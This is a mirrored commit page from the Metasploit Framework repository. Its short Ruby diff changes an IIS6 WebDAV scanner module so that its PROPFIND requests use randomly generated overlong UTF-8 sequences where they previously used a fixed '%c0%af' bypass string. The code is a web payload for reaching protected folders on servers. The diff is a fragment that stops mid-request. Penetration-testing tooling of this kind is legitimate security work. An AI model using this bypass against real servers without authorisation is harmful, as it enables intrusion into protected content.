infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Patch from Erik Fichtner to enable unicode overlong encoding 

git-svn-id: file:///home/svn/framework3/trunk@6575 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-05-22 21:33:20 +00:00
parent 7ef884eba7
commit d434be3ae8
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
modules/auxiliary/scanner/http/wmap_dir_webdav_unicode_bypass.rb
View File

@ -132,8 +132,9 @@ class Metasploit3 < Msf::Auxiliary
print_status("Found protected folder #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})") print_status("Found protected folder #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
print_status("\tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.") print_status("\tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
bogus = Rex::Text.to_unicode( Rex::Text.rand_text(Kernel.rand(32)), 'utf-8', 'overlong', 1+(Kernel.rand(6)) )
res = send_request_cgi({ res = send_request_cgi({
'uri' => tpath + '%c0%af' + testfdir, 'uri' => tpath + bogus + testfdir,
'method' => 'PROPFIND', 'method' => 'PROPFIND',
'ctype' => 'application/xml', 'ctype' => 'application/xml',
'headers' => 'headers' =>